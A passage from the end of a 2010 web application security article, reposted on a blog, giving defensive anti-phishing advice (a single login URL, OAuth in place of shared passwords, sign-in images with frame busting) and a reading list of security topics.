  2. Use one and only one URL for user log in, and make it short and easy to recognize. For our example website, we could use https://login.mybiz.com as our login URL. It’s important that when the user sees a login form for our website, they also see this URL in the URL bar. That trains users to be suspicious of login forms on other URLs
  3. Do not allow partners to ask your users for their credentials on your site. Instead, if partners need to pull user data from your site, provide them with an OAuth based API. This is also known as the Password Anti-Pattern.
  4. Alternatively, you could use something like a sign-in image that some websites are starting to use (e.g. Bank of America, Yahoo!). This is an image that the user selects on your website, that only the user and your website know about. When the user sees this image on the login page, they know that this is the right page. Note that if you use a sign-in seal, you should also use frame busting to make sure an attacker cannot embed your sign-in image page in their phishing page using an iframe.

If a user is trained to hand over their password to anyone who asks for it, then their data isn’t safe.

Summary

While we’ve covered a lot in this article, it still only skims the surface of web application security. Any developer interested in building truly secure applications has to be on top of their game at all times. Stay up to date with various security related mailing lists, and make sure all developers on your team are clued in. Sometimes it may be necessary to sacrifice features for security, but the alternative is far scarier.

Finally, I’d like to thank the Yahoo! Paranoids for all their help in writing this article.

Further reading

  1. OWASP Top 10 security risks
  2. XSS
  3. CSRF
  4. Phishing
  5. Code injection
  6. PHP’s input filters
  7. Password anti-pattern
  8. OAuth
  9. Facebook Like button click-jacking
  10. Anti-anti frame-busting
  11. The Yahoo! Security Center also has articles on how users can protect themselves online.

© Philip Tellis for Smashing Magazine, 2010. | Permalink | Post a comment | Add to del.icio.us | Digg this | Stumble on StumbleUpon! | Tweet it! | Submit to Reddit | Forum Smashing Magazine
Post tags: , , , , ,


  •   
  • Copyright © 1996-2010 BlogmyQuery - BMQ. All rights reserved.
    iDream theme by Templates Next | Powered by WordPress